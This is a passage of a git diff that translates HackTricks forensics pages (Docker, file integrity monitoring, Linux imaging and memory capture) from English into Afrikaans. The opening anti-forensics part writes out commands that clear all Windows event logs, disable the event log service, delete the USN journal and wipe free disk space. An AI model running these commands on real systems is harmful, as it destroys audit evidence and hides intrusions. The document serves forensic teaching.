gekopieer gaan word in die register `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` -It's also possible to modify the configuration of which files are going to be copied in the shadow copy in the registry `HKLM\SYSTEM\CurrentControlSet\Control\BackupRestore\FilesNotToSnapshot` +## Oorskryf verwyderde lêers -## Overwrite deleted files +* Jy kan 'n **Windows-hulpmiddel** gebruik: `cipher /w:C` Dit sal cipher aandui om enige data van die beskikbare ongebruikte skyfspasie binne die C-aandryf te verwyder. +* Jy kan ook hulpmiddels soos [**Eraser**](https://eraser.heidi.ie) gebruik -* You can use a **Windows tool**: `cipher /w:C` This will indicate cipher to remove any data from the available unused disk space inside the C drive. -* You can also use tools like [**Eraser**](https://eraser.heidi.ie) +## Verwyder Windows-gebeurtenislogboeke -## Delete Windows event logs - -* Windows + R --> eventvwr.msc --> Expand "Windows Logs" --> Right click each category and select "Clear Log" +* Windows + R --> eventvwr.msc --> Brei "Windows-logboeke" uit --> Regskliek op elke kategorie en kies "Logboek skoonmaak" * `for /F "tokens=*" %1 in ('wevtutil.exe el') DO wevtutil.exe cl "%1"` * `Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }` -## Disable Windows event logs +## Deaktiveer Windows-gebeurtenislogboeke * `reg add 'HKLM\SYSTEM\CurrentControlSet\Services\eventlog' /v Start /t REG_DWORD /d 4 /f` -* Inside the services section disable the service "Windows Event Log" -* `WEvtUtil.exec clear-log` or `WEvtUtil.exe cl` +* Deaktiveer die diens "Windows Event Log" binne die dienste-afdeling +* `WEvtUtil.exec clear-log` of `WEvtUtil.exe cl` -## Disable $UsnJrnl +## Deaktiveer $UsnJrnl * `fsutil usn deletejournal /d c:`
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
- - diff --git a/forensics/basic-forensic-methodology/docker-forensics.md b/forensics/basic-forensic-methodology/docker-forensics.md index 568cc58ca..5a8c551c3 100644 --- a/forensics/basic-forensic-methodology/docker-forensics.md +++ b/forensics/basic-forensic-methodology/docker-forensics.md @@ -1,31 +1,28 @@ -# Docker Forensics +# Docker Forensika
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repos.
-## Container modification - -There are suspicions that some docker container was compromised: +## Houer-wysiging +Daar is vermoedens dat 'n sekere Docker-houer gekompromitteer is: ```bash docker ps CONTAINER ID IMAGE COMMAND CREATED STATUS PORTS NAMES cc03e43a052a lamp-wordpress "./run.sh" 2 minutes ago Up 2 minutes 80/tcp wordpress ``` - -You can easily **find the modifications done to this container with regards to the image** with: - +Jy kan maklik **die wysigings wat aan hierdie houer gedoen is met betrekking tot die prent** vind met: ```bash docker diff wordpress C /var @@ -39,70 +36,52 @@ A /var/lib/mysql/mysql/time_zone_leap_second.MYI A /var/lib/mysql/mysql/general_log.CSV ... ``` - -In the previous command **C** means **Changed** and **A,** **Added**.\ -If you find that some interesting file like `/etc/shadow` was modified you can download it from the container to check for malicious activity with: - +In die vorige opdrag beteken **C** **Veranderd** en **A,** **Bygevoeg**.\ +As jy vind dat 'n interessante lêer soos `/etc/shadow` gewysig is, kan jy dit van die houer aflaai om vir skadelike aktiwiteit te ondersoek met: ```bash docker cp wordpress:/etc/shadow. ``` - -You can also **compare it with the original one** running a new container and extracting the file from it: - +Jy kan dit ook **vergelyk met die oorspronklike een** deur 'n nuwe houer te hardloop en die lêer daaruit te onttrek: ```bash docker run -d lamp-wordpress docker cp b5d53e8b468e:/etc/shadow original_shadow #Get the file from the newly created container diff original_shadow shadow ``` - -If you find that **some suspicious file was added** you can access the container and check it: - +As jy vind dat **'n verdagte lêer bygevoeg is**, kan jy toegang verkry tot die houer en dit nagaan: ```bash docker exec -it wordpress bash ``` +## Beeldwysigings -## Images modifications - -When you are given an exported docker image (probably in `.tar` format) you can use [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) to **extract a summary of the modifications**: - +Wanneer jy 'n uitgevoerde docker-beeld (waarskynlik in `.tar`-formaat) ontvang, kan jy [**container-diff**](https://github.com/GoogleContainerTools/container-diff/releases) gebruik om 'n opsomming van die wysigings te **onttrek**: ```bash docker save > image.tar #Export the image to a .tar file container-diff analyze -t sizelayer image.tar container-diff analyze -t history image.tar container-diff analyze -t metadata image.tar ``` - -Then, you can **decompress** the image and **access the blobs** to search for suspicious files you may have found in the changes history: - +Dan kan jy die prentjie **ontplooi** en **toegang verkry tot die blobs** om te soek na verdagte lêers wat jy dalk in die veranderingsgeskiedenis gevind het: ```bash tar -xf image.tar ``` +### Basiese Analise -### Basic Analysis - -You can get **basic information** from the image running: - +Jy kan **basiese inligting** kry van die lopende prentjie: ```bash -docker inspect +docker inspect ``` - -You can also get a summary **history of changes** with: - +Jy kan ook 'n opsomming van die **geskiedenis van veranderinge** kry met: ```bash docker history --no-trunc ``` - -You can also generate a **dockerfile from an image** with: - +Jy kan ook 'n **dockerfile van 'n prentjie** genereer met: ```bash alias dfimage="docker run -v /var/run/docker.sock:/var/run/docker.sock --rm alpine/dfimage" dfimage -sV=1.36 madhuakula/k8s-goat-hidden-in-layers> ``` +### Duik -### Dive - -In order to find added/modified files in docker images you can also use the [**dive**](https://github.com/wagoodman/dive) (download it from [**releases**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) utility: - +Om bygevoegde/gewysigde lêers in Docker-beelde te vind, kan jy ook die [**duik**](https://github.com/wagoodman/dive) (laai dit af vanaf [**vrystellings**](https://github.com/wagoodman/dive/releases/tag/v0.10.0)) nut gebruik: ```bash #First you need to load the image in your docker repo sudo docker load < image.tar 1 ⨯ @@ -111,33 +90,30 @@ Loaded image: flask:latest #And then open it with dive: sudo dive flask:latest ``` +Dit stel jou in staat om **deur die verskillende blobs van Docker-beelde te blaai** en te kyk watter lêers gewysig/toegevoeg is. **Rooi** beteken toegevoeg en **geel** beteken gewysig. Gebruik **tab** om na die ander aansig te skuif en **spasie** om vouers in/uit te vou. -This allows you to **navigate through the different blobs of docker images** and check which files were modified/added. **Red** means added and **yellow** means modified. Use **tab** to move to the other view and **space** to collapse/open folders. - -With die you won't be able to access the content of the different stages of the image. To do so you will need to **decompress each layer and access it**.\ -You can decompress all the layers from an image from the directory where the image was decompressed executing: - +Met die sal jy nie toegang tot die inhoud van die verskillende fases van die beeld hê nie. Om dit te doen, sal jy elke laag moet dekomprimeer en toegang daartoe hê.\ +Jy kan al die lae van 'n beeld dekomprimeer vanuit die gids waar die beeld gedekomprimeer is deur die volgende uit te voer: ```bash tar -xf image.tar for d in `find * -maxdepth 0 -type d`; do cd $d; tar -xf ./layer.tar; cd ..; done ``` +## Legitieme inligting uit geheue -## Credentials from memory +Let daarop dat wanneer jy 'n docker-houer binne 'n gasheer uitvoer, **kan jy die prosesse wat op die houer loop vanaf die gasheer sien** deur eenvoudig `ps -ef` uit te voer. -Note that when you run a docker container inside a host **you can see the processes running on the container from the host** just running `ps -ef` - -Therefore (as root) you can **dump the memory of the processes** from the host and search for **credentials** just [**like in the following example**](../../linux-hardening/privilege-escalation/#process-memory). +Daarom kan jy (as root) **die geheue van die prosesse uit die gasheer dump** en soek na **legitieme inligting** net [**soos in die volgende voorbeeld**](../../linux-hardening/privilege-escalation/#process-memory).
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil hê jou **maatskappy geadverteer moet word in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-opslag.
diff --git a/forensics/basic-forensic-methodology/file-integrity-monitoring.md b/forensics/basic-forensic-methodology/file-integrity-monitoring.md index 4e75ea70e..30b18e95f 100644 --- a/forensics/basic-forensic-methodology/file-integrity-monitoring.md +++ b/forensics/basic-forensic-methodology/file-integrity-monitoring.md @@ -1,56 +1,52 @@ - -
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
# Baseline -A baseline consists of taking a snapshot of certain parts of a system to **compare it with a future status to highlight changes**. +'n Baselyn bestaan uit die neem van 'n oorsig van sekere dele van 'n stelsel om dit met 'n toekomstige status te **vergelyk om veranderinge te beklemtoon**. -For example, you can calculate and store the hash of each file of the filesystem to be able to find out which files were modified.\ -This can also be done with the user accounts created, processes running, services running and any other thing that shouldn't change much, or at all. +Byvoorbeeld, jy kan die has van elke lêer in die lêersisteem bereken en stoor om uit te vind watter lêers gewysig is.\ +Dit kan ook gedoen word met die gebruikersrekeninge wat geskep is, prosesse wat loop, dienste wat loop en enige ander ding wat nie baie of glad nie moet verander nie. -## File Integrity Monitoring +## Lêerintegriteitsmonitering -File Integrity Monitoring (FIM) is a critical security technique that protects IT environments and data by tracking changes in files. It involves two key steps: +Lêerintegriteitsmonitering (FIM) is 'n kritieke sekuriteitstegniek wat IT-omgewings en data beskerm deur veranderinge in lêers te volg. Dit behels twee sleutelstappe: -1. **Baseline Comparison:** Establish a baseline using file attributes or cryptographic checksums (like MD5 or SHA-2) for future comparisons to detect modifications. -2. **Real-Time Change Notification:** Get instant alerts when files are accessed or altered, typically through OS kernel extensions. +1. **Baselynvergelyking:** Stel 'n baselyn vas deur lêereienskappe of kriptografiese kontrolesomme (soos MD5 of SHA-2) te gebruik vir toekomstige vergelykings om wysigings op te spoor. +2. **Real-Time Veranderingskennisgewing:** Kry onmiddellike waarskuwings wanneer lêers geopen of gewysig word, tipies deur bedryfstelsel-kerneluitbreidings. -## Tools +## Gereedskap * [https://github.com/topics/file-integrity-monitoring](https://github.com/topics/file-integrity-monitoring) * [https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software](https://www.solarwinds.com/security-event-manager/use-cases/file-integrity-monitoring-software) -## References +## Verwysings * [https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it](https://cybersecurity.att.com/blogs/security-essentials/what-is-file-integrity-monitoring-and-why-you-need-it)
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
- - diff --git a/forensics/basic-forensic-methodology/linux-forensics.md b/forensics/basic-forensic-methodology/linux-forensics.md index e55a5824b..cdbb6c663 100644 --- a/forensics/basic-forensic-methodology/linux-forensics.md +++ b/forensics/basic-forensic-methodology/linux-forensics.md @@ -1,40 +1,36 @@ -# Linux Forensics +# Linux Forensika
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomaties werkstrome te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)! +Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)! -Other ways to support HackTricks: +Ander maniere om HackTricks te ondersteun: -* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** -* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos. +* As jy jou **maatskappy in HackTricks wil adverteer** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! +* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com) +* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family) +* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.** +* **Deel jou hacktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github-repositoriums.
-## Initial Information Gathering +## Aanvanklike Inligting Versameling -### Basic Information - -First of all, it's recommended to have some **USB** with **good known binaries and libraries on it** (you can just get ubuntu and copy the folders _/bin_, _/sbin_, _/lib,_ and _/lib64_), then mount the USB, and modify the env variables to use those binaries: +### Basiese Inligting +Eerstens word dit aanbeveel om 'n **USB** te hê met **bekende goeie binêre en biblioteke daarop** (jy kan net Ubuntu kry en die _/bin_, _/sbin_, _/lib,_ en _/lib64_ lêers kopieer), monteer dan die USB en wysig die omgewingsveranderlikes om daardie binêre te gebruik: ```bash export PATH=/mnt/usb/bin:/mnt/usb/sbin export LD_LIBRARY_PATH=/mnt/usb/lib:/mnt/usb/lib64 ``` - -Once you have configured the system to use good and known binaries you can start **extracting some basic information**: - +Sodra jy die stelsel gekonfigureer het om goeie en bekende binaire lêers te gebruik, kan jy begin met die **onttrekking van basiese inligting**: ```bash date #Date and time (Clock may be skewed, Might be at a different timezone) uname -a #OS info @@ -52,51 +48,47 @@ cat /etc/passwd #Unexpected data? cat /etc/shadow #Unexpected data? find /directory -type f -mtime -1 -print #Find modified files during the last minute in the directory ``` +#### Verdagte inligting -#### Suspicious information +Terwyl jy die basiese inligting bekom, moet jy kyk vir vreemde dinge soos: -While obtaining the basic information you should check for weird things like: +* **Root prosesse** loop gewoonlik met lae PIDS, so as jy 'n root proses vind met 'n groot PID, kan jy vermoed +* Kyk na **geregistreerde aanmeldings** van gebruikers sonder 'n skulp binne `/etc/passwd` +* Kyk vir **wagwoordhasings** binne `/etc/shadow` vir gebruikers sonder 'n skulp -* **Root processes** usually run with low PIDS, so if you find a root process with a big PID you may suspect -* Check **registered logins** of users without a shell inside `/etc/passwd` -* Check for **password hashes** inside `/etc/shadow` for users without a shell +### Geheue Dump -### Memory Dump - -To obtain the memory of the running system, it's recommended to use [**LiME**](https://github.com/504ensicsLabs/LiME).\ -To **compile** it, you need to use the **same kernel** that the victim machine is using. +Om die geheue van die lopende stelsel te verkry, word dit aanbeveel om [**LiME**](https://github.com/504ensicsLabs/LiME) te gebruik.\ +Om dit te **kompileer**, moet jy dieselfde kernel gebruik as die slagoffer se masjien. {% hint style="info" %} -Remember that you **cannot install LiME or any other thing** in the victim machine as it will make several changes to it +Onthou dat jy **nie LiME of enige ander ding** op die slagoffer se masjien kan installeer nie, aangesien dit verskeie veranderinge daaraan sal maak. {% endhint %} -So, if you have an identical version of Ubuntu you can use `apt-get install lime-forensics-dkms`\ -In other cases, you need to download [**LiME**](https://github.com/504ensicsLabs/LiME) from github and compile it with correct kernel headers. To **obtain the exact kernel headers** of the victim machine, you can just **copy the directory** `/lib/modules/` to your machine, and then **compile** LiME using them: - +As jy 'n identiese weergawe van Ubuntu het, kan jy `apt-get install lime-forensics-dkms` gebruik.\ +In ander gevalle moet jy [**LiME**](https://github.com/504ensicsLabs/LiME) van GitHub aflaai en dit met die korrekte kernelkoppele kompilleer. Om die presiese kernelkoppele van die slagoffer se masjien te verkry, kan jy eenvoudig die gids `/lib/modules/` na jou masjien kopieer en dan LiME daarmee kompilleer: ```bash make -C /lib/modules//build M=$PWD sudo insmod lime.ko "path=/home/sansforensics/Desktop/mem_dump.bin format=lime" ``` +LiME ondersteun 3 **formate**: -LiME supports 3 **formats**: +* Roh (elke segment saamgevoeg) +* Gepad (soortgelyk aan roh, maar met nulle in die regterbits) +* Lime (aanbevole formaat met metadata) -* Raw (every segment concatenated together) -* Padded (same as raw, but with zeroes in right bits) -* Lime (recommended format with metadata +LiME kan ook gebruik word om die dump **via die netwerk te stuur** in plaas daarvan om dit op die stelsel te stoor deur iets soos te gebruik: `path=tcp:4444` -LiME can also be used to **send the dump via network** instead of storing it on the system using something like: `path=tcp:4444` +### Skyskaping -### Disk Imaging +#### Afskakeling -#### Shutting down +Eerstens, sal jy die stelsel moet **afskaal**. Dit is nie altyd 'n opsie nie, aangesien die stelsel soms 'n produksieserver kan wees wat die maatskappy nie kan bekostig om af te skaal nie.\ +Daar is **2 maniere** om die stelsel af te skaal, 'n **normale afskakeling** en 'n **"trek die prop uit" afskakeling**. Die eerste een sal die **prosesse toelaat om soos gewoonlik te beëindig** en die **lêersisteem** om **gelyk te maak**, maar dit sal ook die moontlike **malware** toelaat om **bewyse te vernietig**. Die "trek die prop uit" benadering mag 'n **sekere verlies van inligting** meebring (nie baie van die inligting gaan verlore gaan nie aangesien ons reeds 'n beeld van die geheue geneem het nie) en die **malware sal geen geleentheid hê** om iets daaraan te doen nie. Daarom, as jy **vermoed** dat daar 'n **malware** mag wees, voer net die **`sync`** **opdrag** op die stelsel uit en trek die prop uit. -First of all, you will need to **shut down the system**. This isn't always an option as some times system will be a production server that the company cannot afford to shut down.\ -There are **2 ways** of shutting down the system, a **normal shutdown** and a **"plug the plug" shutdown**. The first one will allow the **processes to terminate as usual** and the **filesystem** to be **synchronized**, but it will also allow the possible **malware** to **destroy evidence**. The "pull the plug" approach may carry **some information loss** (not much of the info is going to be lost as we already took an image of the memory ) and the **malware won't have any opportunity** to do anything about it. Therefore, if you **suspect** that there may be a **malware**, just execute the **`sync`** **command** on the system and pull the plug. - -#### Taking an image of the disk - -It's important to note that **before connecting your computer to anything related to the case**, you need to be sure that it's going to be **mounted as read only** to avoid modifying any information. +#### Neem 'n beeld van die skyf +Dit is belangrik om daarop te let dat **voordat jy jou rekenaar aan iets wat met die saak verband hou, koppel**, jy moet seker maak dat dit as **alleen-lees** gemonteer gaan word om enige inligting te verander. ```bash #Create a raw copy of the disk dd if= of= bs=512 @@ -105,35 +97,33 @@ dd if= of= bs=512 dcfldd if= of= bs=512 hash= hashwindow= hashlog= dcfldd if=/dev/sdc of=/media/usb/pc.image hash=sha256 hashwindow=1M hashlog=/media/usb/pc.hashes ``` +### Voor-analise van skijfafbeelding -### Disk Image pre-analysis - -Imaging a disk image with no more data. - +Beeld 'n skijfafbeelding af sonder enige verdere data. ```bash #Find out if it's a disk image using "file" command -file disk.img +file disk.img disk.img: Linux rev 1.0 ext4 filesystem data, UUID=59e7a736-9c90-4fab-ae35-1d6a28e5de27 (extents) (64bit) (large files) (huge files) #Check which type of disk image it's -img_stat -t evidence.img +img_stat -t evidence.img raw #You can list supported types with img_stat -i list Supported image format types: - raw (Single or split raw file (dd)) - aff (Advanced Forensic Format) - afd (AFF Multiple File) - afm (AFF with external metadata) - afflib (All AFFLIB image formats (including beta ones)) - ewf (Expert Witness Format (EnCase)) +raw (Single or split raw file (dd)) +aff (Advanced Forensic Format) +afd (AFF Multiple File) +afm (AFF with external metadata) +afflib (All AFFLIB image formats (including beta ones)) +ewf (Expert Witness Format (EnCase)) #Data of the image -fsstat -i raw -f ext4 disk.img +fsstat -i raw -f ext4 disk.img FILE SYSTEM INFORMATION -------------------------------------------- File System Type: Ext4 -Volume Name: +Volume Name: Volume ID: 162850f203fd75afab4f1e4736a7e776 Last Written at: 2020-02-06 06:22:48 (UTC) @@ -162,42 +152,39 @@ r/r 16: secret.txt icat -i raw -f ext4 disk.img 16 ThisisTheMasterSecret ``` -
-\ -Use [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) to easily build and **automate workflows** powered by the world's **most advanced** community tools.\ -Get Access Today: +Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en outomatiese werksvloeie te bou met behulp van die wêreld se mees gevorderde gemeenskapsinstrumente.\ +Kry vandag toegang: {% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %} -## Search for known Malware +## Soek na bekende Malware -### Modified System Files +### Gewysigde Sisteemlêers -Linux offers tools for ensuring the integrity of system components, crucial for spotting potentially problematic files. +Linux bied gereedskap om die integriteit van sisteemkomponente te verseker, wat belangrik is om potensieel problematiese lêers op te spoor. -- **RedHat-based systems**: Use `rpm -Va` for a comprehensive check. -- **Debian-based systems**: `dpkg --verify` for initial verification, followed by `debsums | grep -v "OK$"` (after installing `debsums` with `apt-get install debsums`) to identify any issues. +- **RedHat-gebaseerde stelsels**: Gebruik `rpm -Va` vir 'n omvattende ondersoek. +- **Debian-gebaseerde stelsels**: `dpkg --verify` vir aanvanklike verifikasie, gevolg deur `debsums | grep -v "OK$"` (nadat `debsums` geïnstalleer is met `apt-get install debsums`) om enige probleme te identifiseer. -### Malware/Rootkit Detectors +### Malware/Rootkit Detekteerders -Read the following page to learn about tools that can be useful to find malware: +Lees die volgende bladsy om meer te wete te kom oor gereedskap wat nuttig kan wees om malware op te spoor: {% content-ref url="malware-analysis.md" %} [malware-analysis.md](malware-analysis.md) {% endcontent-ref %} -## Search installed programs +## Soek geïnstalleerde programme -To effectively search for installed programs on both Debian and RedHat systems, consider leveraging system logs and databases alongside manual checks in common directories. +Om doeltreffend te soek na geïnstalleerde programme op beide Debian- en 